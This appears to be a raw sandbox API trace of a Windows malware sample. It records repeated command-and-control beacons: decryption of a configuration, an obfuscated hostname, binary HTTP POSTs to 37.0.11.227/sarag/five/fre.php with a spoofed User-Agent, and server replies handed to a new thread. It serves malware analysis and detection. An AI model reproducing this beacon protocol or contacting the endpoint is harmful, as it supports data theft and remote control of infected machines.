0x76ed0000 [0238.760] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0238.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.762] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0238.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.763] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0238.764] GetProcessHeap () returned 0x690000 [0238.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0238.764] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0238.764] GetProcessHeap () returned 0x690000 [0238.765] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0238.765] GetProcessHeap () returned 0x690000 [0238.765] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0238.765] GetProcessHeap () returned 0x690000 [0238.766] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0238.766] GetProcessHeap () returned 0x690000 [0238.766] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0238.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.767] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.775] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0238.781] GetProcessHeap () returned 0x690000 [0238.782] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0238.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.783] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0238.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.784] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.785] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.785] GetProcessHeap () returned 0x690000 [0238.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0238.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.787] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0238.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.788] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0238.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.789] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0238.789] GetProcessHeap () returned 0x690000 [0238.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0238.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.790] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0238.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.792] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0238.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.793] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0238.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.794] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0238.794] GetProcessHeap () returned 0x690000 [0238.794] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0238.794] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0238.795] GetProcessHeap () returned 0x690000 [0238.795] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0238.795] socket (af=2, type=1, protocol=6) returned 0x634 [0238.795] connect (s=0x634, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0238.825] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0238.825] GetProcessHeap () returned 0x690000 [0238.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0238.825] GetProcessHeap () returned 0x690000 [0238.825] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b77b0 [0238.826] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0238.827] wvsprintfA (in: param_1=0x6b77b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0238.827] GetProcessHeap () returned 0x690000 [0238.827] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0238.827] GetProcessHeap () returned 0x690000 [0238.827] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0238.827] GetProcessHeap () returned 0x690000 [0238.827] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0238.827] GetProcessHeap () returned 0x690000 [0238.827] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b77b0 [0238.839] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0238.840] wvsprintfA (in: param_1=0x6b77b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0238.840] GetProcessHeap () returned 0x690000 [0238.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0238.840] GetProcessHeap () returned 0x690000 [0238.841] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0238.841] send (s=0x634, buf=0x6ad508*, len=242, flags=0) returned 242 [0238.841] send (s=0x634, buf=0x6aba40*, len=159, flags=0) returned 159 [0238.841] GetProcessHeap () returned 0x690000 [0238.841] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0238.842] recv (in: s=0x634, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0238.915] GetProcessHeap () returned 0x690000 [0238.916] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0238.916] GetProcessHeap () returned 0x690000 [0238.916] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0238.916] GetProcessHeap () returned 0x690000 [0238.916] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0238.916] GetProcessHeap () returned 0x690000 [0238.917] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0238.917] closesocket (s=0x634) returned 0 [0238.918] GetProcessHeap () returned 0x690000 [0238.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0238.918] GetProcessHeap () returned 0x690000 [0238.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0238.918] GetProcessHeap () returned 0x690000 [0238.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0238.920] GetProcessHeap () returned 0x690000 [0238.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0238.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xda4) returned 0x634 [0238.922] Sleep (dwMilliseconds=0xea60) [0238.924] GetProcessHeap () returned 0x690000 [0238.924] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0238.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.925] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.930] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0238.935] GetProcessHeap () returned 0x690000 [0238.935] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0238.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.936] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0238.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.937] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.938] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.938] GetProcessHeap () returned 0x690000 [0238.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0238.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.940] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0238.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.942] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0238.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.945] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0238.945] GetProcessHeap () returned 0x690000 [0238.945] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0238.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.947] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0238.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.948] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0238.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.949] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0238.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.950] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0238.950] GetProcessHeap () returned 0x690000 [0238.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0238.950] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0238.950] GetProcessHeap () returned 0x690000 [0238.950] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0238.951] GetProcessHeap () returned 0x690000 [0238.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0238.951] GetProcessHeap () returned 0x690000 [0238.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0238.951] GetProcessHeap () returned 0x690000 [0238.951] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0238.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.955] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0238.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.960] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0238.965] GetProcessHeap () returned 0x690000 [0238.965] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0238.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.966] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0238.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.967] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0238.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.968] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0238.968] GetProcessHeap () returned 0x690000 [0238.968] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0238.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.969] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0238.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.970] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0238.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0238.971] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0238.971] GetProcessHeap () returned 0x690000 [0238.971] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0238.971] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.972] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0238.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.972] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0238.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.973] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0238.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0238.974] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0238.974] GetProcessHeap () returned 0x690000 [0238.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0238.974] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0238.974] GetProcessHeap () returned 0x690000 [0238.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0238.974] socket (af=2, type=1, protocol=6) returned 0x638 [0238.975] connect (s=0x638, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0239.006] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0239.006] GetProcessHeap () returned 0x690000 [0239.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0239.007] GetProcessHeap () returned 0x690000 [0239.007] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b77b0 [0239.007] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0239.008] wvsprintfA (in: param_1=0x6b77b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0239.008] GetProcessHeap () returned 0x690000 [0239.008] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0239.008] GetProcessHeap () returned 0x690000 [0239.008] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0239.009] GetProcessHeap () returned 0x690000 [0239.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0239.009] GetProcessHeap () returned 0x690000 [0239.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b77b0 [0239.009] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0239.010] wvsprintfA (in: param_1=0x6b77b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0239.010] GetProcessHeap () returned 0x690000 [0239.010] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0239.010] GetProcessHeap () returned 0x690000 [0239.011] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b77b0 | out: hHeap=0x690000) returned 1 [0239.011] send (s=0x638, buf=0x6ad508*, len=242, flags=0) returned 242 [0239.011] send (s=0x638, buf=0x6aba40*, len=159, flags=0) returned 159 [0239.011] GetProcessHeap () returned 0x690000 [0239.011] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0239.011] recv (in: s=0x638, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0239.077] GetProcessHeap () returned 0x690000 [0239.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0239.078] GetProcessHeap () returned 0x690000 [0239.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0239.079] GetProcessHeap () returned 0x690000 [0239.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0239.079] GetProcessHeap () returned 0x690000 [0239.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0239.079] closesocket (s=0x638) returned 0 [0239.080] GetProcessHeap () returned 0x690000 [0239.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0239.080] GetProcessHeap () returned 0x690000 [0239.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0239.080] GetProcessHeap () returned 0x690000 [0239.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0239.081] GetProcessHeap () returned 0x690000 [0239.081] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0239.081] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf94) returned 0x638 [0239.083] Sleep (dwMilliseconds=0xea60) [0239.084] GetProcessHeap () returned 0x690000 [0239.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0239.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.086] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0239.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.092] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0239.137] GetProcessHeap () returned 0x690000 [0239.137] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0239.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.151] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0239.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.152] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0239.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.153] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0239.153] GetProcessHeap () returned 0x690000 [0239.154] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0239.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.154] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0239.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.155] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0239.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0239.156] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0239.156] GetProcessHeap () returned 0x690000 [0239.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0239.157] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.157] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0239.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.160] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0239.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.161] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0239.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0239.162] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0239.162] GetProcessHeap () returned 0x690000 [0239.162] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0239.162] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), 